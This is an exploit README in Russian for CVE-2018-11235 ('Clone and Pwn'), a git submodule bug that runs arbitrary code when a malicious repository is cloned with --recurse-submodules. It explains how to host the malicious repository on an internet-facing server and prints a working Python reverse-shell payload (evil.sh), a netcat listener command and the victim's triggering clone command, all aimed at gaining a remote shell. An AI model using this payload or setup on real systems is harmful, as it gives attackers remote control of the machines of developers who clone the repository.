
Exploits CVE-2018-11235
Название эксплойта: Clone and Pwn
Дата: 4 июня 2018 г.
Автор эксплойта: Alejandro Caceres
Сайт разработчика: https://git-scm.com/
Ссылка на ПО: https://git-scm.com/downloads
Версия: произвольный код выполняется на клиентах git в Git до 2.13.7, 2.14.x до 2.14.4, 2.15.x до 2.15.2, 2.16.x до 2.16.4, и 2.17.x до 2.17.1
Протестировано на: Linux: Ubuntu, Mint, MacOSX
CVE: CVE-2018-11235
CVE-2018-11235, названный здесь clone and pwn, создаёт вредоносный git-репозиторий, эксплуатирующий ошибку в git. Когда репозиторий клонируется с флагом --recurse-submodules, произвольный код выполняется на клиентах git в Git до 2.13.7, 2.14.x до 2.14.4, 2.15.x до 2.15.2, 2.16.x до 2.16.4, и 2.17.x до 2.17.1.
Чтобы использовать этот модуль, просто поместите его на сервер с прямым доступом в интернет (например, AWS, digital ocean) и откройте evil.sh. Оно будет выглядеть примерно так:
#!/usr/bin/python
EXTERN_IP="127.0.0.1"
EXTERN_PORT=8080
#reverse shell to IP EXTERN_IP and port EXTERN_PORT
import socket, subprocess, os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((EXTERN_IP, EXTERN_PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Установите EXTERN_IP и EXTERN_PORT на IP (внешний) и порт, на который вы хотите получать reverse shell. Reverse shell можно получить с помощью чего-то вроде:
nc -l <EXTERN_IP> EXTERN_PORT например nc -l 193.23.23.32 8080
Или с помощью модуля generic shell от Metasploit. Как только пользователь выполнит команду git clone --recurse-submodules git://<your ip>/repo dest_dir, вы получите reverse shell.
Если у вас возникли проблемы с многократным запуском (или после неудачной попытки), проверьте следующее:
ps aux | grep git, чтобы убедиться, что gitdaemon не запущен. Убейте все процессы gitdaemon.Код основан на git patch от @peff (см. файл теста t/t7415-submodule-names.sh).
Соответственно, этот репозиторий опубликован под GNU General Public License версии 2.
Дополнительное исправление для старых версий git предоставлено @atorralba (подробности в этом посте).
Этот скрипт адаптирован из https://github.com/Rogdham/CVE-2018-11235, большая благодарность и уважение
=======
Эксплуатирует CVE-2018-11235
Авторы: @_hyp3ri0n и @mehaase